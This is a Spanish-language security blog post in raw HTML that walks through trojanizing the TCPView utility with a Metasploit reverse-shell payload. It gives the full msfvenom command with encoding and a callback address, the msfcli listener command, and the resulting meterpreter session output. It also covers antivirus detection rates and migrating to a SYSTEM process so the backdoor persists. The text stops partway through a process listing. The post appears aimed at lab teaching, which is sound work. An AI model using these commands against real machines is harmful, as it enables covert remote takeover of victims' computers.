&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;El contenido de este artículo es meramente informativo y/o con fines educativos,&amp;nbsp;&lt;/span&gt;&lt;u style="background-color: #f4cccc; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px; text-align: justify;"&gt;no me hago responsable&lt;/u&gt;&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;&amp;nbsp;del uso que de él se pueda hacer.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Sin embargo, por algún motivo que por el momento no he sido capaz de desenmascarar el ejecutable generado tcpviewmod2.exe con exe-small (~5Kbytes) no funciona correctamente ;(&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: orange;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&lt;u&gt;&lt;b&gt;Generando un EXE para las pruebas&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Template&lt;/b&gt;: Tcpview.exe&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Payload: windows/meterpreter/reverse_tcp&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Creación nuevo hilo sobre el template= true&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Encoding: x86/shikata_ga_nai&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Restricción de caracteres= yes (&lt;/span&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;\x00\x20\x0a\x0d&lt;/span&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b style="text-align: justify;"&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&amp;nbsp;&amp;gt; msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 10 -f exe LHOST=192.168.2.105 LPORT=80 &amp;gt; tcpviewRmod80.exe&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-wVwMV8HFQyg/UUxyLHoWaKI/AAAAAAAAEOA/r70RxophUAo/s1600/MSF_venom-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="276" src="http://3.bp.blogspot.com/-wVwMV8HFQyg/UUxyLHoWaKI/AAAAAAAAEOA/r70RxophUAo/s640/MSF_venom-5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultados VT (virustotal) 28/45 (62%) | Principales motores de antivirus lo detectan correctamente, con la salvedad de TrendMicro puede comprobarse usando el siguiente hash || SHA256:&amp;nbsp;8bfb89a906540d8f553914c88f8db5102224e0be8064093e8617e845f4d4a528&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: white;"&gt;&lt;span style="background-color: #e06666;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 6&lt;/b&gt;: &lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt;Probando el funcionamiento de tcpviewRmod80.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para finalizar el artículo y confirmar la utilidad de los ejemplos anteriores voy a mostrar que h&lt;span style="text-align: justify;"&gt;ay varias formas de gestionar la conexión del backdoor que se ha generado en el ejecutable, la primera sería utilizando la consola de comandos de #Metasploit, y configurando el exploit/multi/handler para nuestro menester.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
O la segunda, más apropiado para el este caso, es utilizar el comando msfcli, nos permite interactuar en la línea de comandos de Linux con el framework de metasploit llegando al mismo fin , pero con menos comandos, veamos con un ejemplo:&lt;/div&gt;
&lt;br /&gt;
Configuración de #Metasploit para gestionar la conexión inversa de Meterpreter, utilizando para ello MSFCLI.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b style="text-align: justify;"&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&amp;nbsp;&amp;gt; msfcli -h&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-V_ms0Lnj2ek/UUxN9RVo5cI/AAAAAAAAENo/UaCY4kp3Kss/s1600/MSF_cli_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="284" src="http://3.bp.blogspot.com/-V_ms0Lnj2ek/UUxN9RVo5cI/AAAAAAAAENo/UaCY4kp3Kss/s640/MSF_cli_2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfcli -h [Muestra el menú de ayuda]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;b&gt;r&lt;/b&gt;&lt;/span&gt;&lt;b style="text-align: justify;"&gt;&lt;span style="background-color: #eeeeee;"&gt;oot@ST2Labs&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&amp;nbsp;&amp;gt; msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.2.105 LPORT=80 EnableContextEncoding=true E&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Recordamos el escenario:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s1600/ST2Labs_vmware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s640/ST2Labs_vmware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;
&lt;/span&gt; Se ejecuta &lt;b&gt;tcpviewRmod80.exe &lt;/b&gt;en el Windows, y se obtiene una&amp;nbsp;sesión&amp;nbsp;de meterpreter, finalizando a sí nuestro objetivo.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-5NflojW-MNI/UUx2fDzaMwI/AAAAAAAAEOQ/ATnQJEYUXWc/s1600/MSF_payload-exito-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="514" src="http://4.bp.blogspot.com/-5NflojW-MNI/UUx2fDzaMwI/AAAAAAAAEOQ/ATnQJEYUXWc/s640/MSF_payload-exito-3.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Ejecución de tcpviewRmod80.exe&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Se puede ver en la imagen siguiente, como la consola de Metasploit, recibe una conexión al puerto 80, y se crea una sesión meterpreter con la victima.&lt;br /&gt;
&lt;span style="background-color: #eeeeee; text-align: justify;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-lVf-3Y1oQI0/UUxy1gEkOeI/AAAAAAAAEOM/ZPKaX9JADrw/s1600/MSF_venom-6.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;img border="0" height="418" src="http://1.bp.blogspot.com/-lVf-3Y1oQI0/UUxy1gEkOeI/AAAAAAAAEOM/ZPKaX9JADrw/s640/MSF_venom-6.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfcli [Metasploit server meterpreter]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Nota&lt;/b&gt;: Al utilizarse Tcpview.exe como ejecutable y ser utilizado para cargar meterpreter en un hilo del mismo, meterpreter se esta ejecutando con el PID (el proceso tcpviewRmod80.exe), ahora podríamos usar &lt;b&gt;migrate&lt;/b&gt; para mover meterpreter a otro proceso más estable. De esa forma, si el usuario cierra el programa tcpviewRmod80.exe meterpreter&amp;nbsp;seguirá&amp;nbsp;ejecutándose&amp;nbsp;en el sistema.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: white;"&gt;&lt;span style="background-color: #e06666;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 7&lt;/b&gt;: &lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt;Migrando meterpreter a un proceso más estable con privilegios SYSTEM &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Comando ejecutados en la consola de "meterpreter" para llevar la migración del proceso meterpreter.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; sysinfo&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Computer &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: MNT_USER&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;OS &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: Windows XP (Build 2600, Service Pack 3).&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Architecture &amp;nbsp; &amp;nbsp;: x86&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;System Language : es_ES&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Meterpreter &amp;nbsp; &amp;nbsp; : x86/win32&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; getpid&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Current pid: 120&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;meterpreter &amp;gt; ps&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;Process List&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;============&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;PID &amp;nbsp; PPID &amp;nbsp;Name &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Arch &amp;nbsp;Session &amp;nbsp; &amp;nbsp; User &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Path&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;--- &amp;nbsp; ---- &amp;nbsp;---- &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;---- &amp;nbsp;------- &amp;nbsp; &amp;nbsp; ---- &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ----&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;0 &amp;nbsp; &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; [System Process] &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4294967295 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;4 &amp;nbsp; &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; System &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;120 &amp;nbsp; 1576 &amp;nbsp;tcpviewRmod80.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\Intercambio documentos\tcpviewRmod80.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;240 &amp;nbsp; 700 &amp;nbsp; vmtoolsd.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;568 &amp;nbsp; 4 &amp;nbsp; &amp;nbsp; smss.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\SystemRoot\System32\smss.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;632 &amp;nbsp; 568 &amp;nbsp; csrss.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\??\C:\WINDOWS\system32\csrss.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;656 &amp;nbsp; 568 &amp;nbsp; winlogon.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;\??\C:\WINDOWS\system32\winlogon.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;700 &amp;nbsp; 656 &amp;nbsp; services.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\services.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;712 &amp;nbsp; 656 &amp;nbsp; lsass.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\lsass.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;780 &amp;nbsp; 700 &amp;nbsp; alg.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\System32\alg.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;880 &amp;nbsp; 700 &amp;nbsp; vmacthlp.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;904 &amp;nbsp; 700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1008 &amp;nbsp;1576 &amp;nbsp;notepad.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\NOTEPAD.EXE&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1012 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1084 &amp;nbsp;1100 &amp;nbsp;wscntfy.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MNT_USER\admin &amp;nbsp; &amp;nbsp; &amp;nbsp; C:\WINDOWS\system32\wscntfy.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1100 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\System32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1156 &amp;nbsp;700 &amp;nbsp; wmiapsrv.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; NT AUTHORITY\SYSTEM &amp;nbsp;C:\WINDOWS\system32\wbem\wmiapsrv.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;&amp;nbsp;1188 &amp;nbsp;700 &amp;nbsp; svchost.exe &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x86 &amp;nbsp; 0 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;C:\WINDOWS\system32\svchost.exe&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
